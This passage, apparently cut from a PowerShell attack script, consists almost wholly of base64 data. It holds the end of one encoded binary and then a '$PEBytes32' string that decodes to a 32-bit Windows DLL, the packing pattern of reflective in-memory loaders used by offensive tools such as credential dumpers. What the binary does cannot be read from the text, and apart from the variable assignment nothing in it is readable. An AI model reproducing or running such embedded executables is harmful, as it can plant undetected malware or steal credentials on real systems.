qmKqoqriqyKrYquiq+KoIqxirKKs4q0irWKtoq3iriKuYq6iruKvIq9ir6Kv4qwisGKworDisSKxYrGiseKyIrJisqKy4rMis2KzorPisCK0YrSitOK1IrVitaK14rYitmK2orbityK3Yreit+K0IrhiuKK44rkiuWK5orniuiK6YrqiuuK7Irtiu6K74rgivGK8orzivSK9Yr2iveK+Ir5ivqK+4r8iv2K/or/ivAGABAKwAAAAIoBigKKA4oEigWKBooHigiKCYoKiguKDIoNig6KD4oAihGKEooTihSKFYoWiheKGIoZihqKG4ocih2KHoofihCKIYoiiiOKJIoliiaKJ4ooiimKKooriiyKLYouii+KIIoxijKKM4o0ijWKNoo3ijiKOYo6ijuKPIo9ij6KP4owikGKQopDikSKRYpGikeKSIpJikqKS4pMik2KTopPikCKUAAABwAQDMAAAAcKB4oICgiKCQoJigoKCooLCguKDAoMig0KDYoOCg6KDwoPigAKEIoRChGKEgoSihMKE4oUChSKFQoVihYKFooXCheKGAoYihkKGYoaChqKGwobihwKHIodCh2KHgoeih8KH4oQCiCKIQohiiIKIoojCiOKJAokiiUKJYomCiaKJwoniigKKIopCimKKgoqiisKK4osCiyKLQotii4KLoovCi+KIAowijEKMYoyCjKKMwozijQKNIo1CjWKNgo2ijcKN4owCAAQDMAAAA2KLgouii8KL4ogCjCKMQoxijIKMoozCjOKNAo0ijUKNYo2CjaKNwo3ijgKOIo5CjmKOgo6ijsKO4o8CjyKPQo9ij4KPoo/Cj+KMApAikEKQYpCCkKKQwpDikQKRIpFCkWKRgpGikcKR4pICkiKSQpJikoKSopLCkuKTApMik0KTYpOCk6KTwpPikAKUIpRClGKUgpSilMKU4pUClSKVQpVilYKVopXCleKWApYilkKWYpaClqKWwpbilwKXIpdCl2KU4qQDAAQAkAQAAAKAooFCgeKCgoNCgGKNQplimYKZopnCmeKaApoimkKaYpqCmqKawprimwKbIptCm2Kbgpuim8Kb4pgCnCKcQpxinIKcopzCnOKdAp0inUKdYp2CnaKdwp3ingKeIp5CnmKegp7CnuKfAp8in0KfYp+Cn6Kfwp/inAKgIqBCoGKggqCioMKg4qECoSKhQqFioYKhoqHCoeKiAqIiokKiYqKCoqKiwqLiowKjIqNCo2KjgqOio8Kj4qACpCKkQqVipeKmYqbip2KkQqiiqMKo4qkCqiKqQqpiqaKzQrtiu4K7orvCu+K4ArwivEK8YryivMK84r0CvSK9Qr1ivYK9or3CveK+Ir5CvmK+gr6ivsK+4r8CvyK/Qr+Cv8K8A0AEASAAAAKij4KMYpEikgKS4pPikMKVopaCl4KUQpjimYKaIprCm2KYApyinUKd4p6in4KcQqDioYKiAqKioyKjQqNioAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==\"\n\t[String]$PEBytes32 = \"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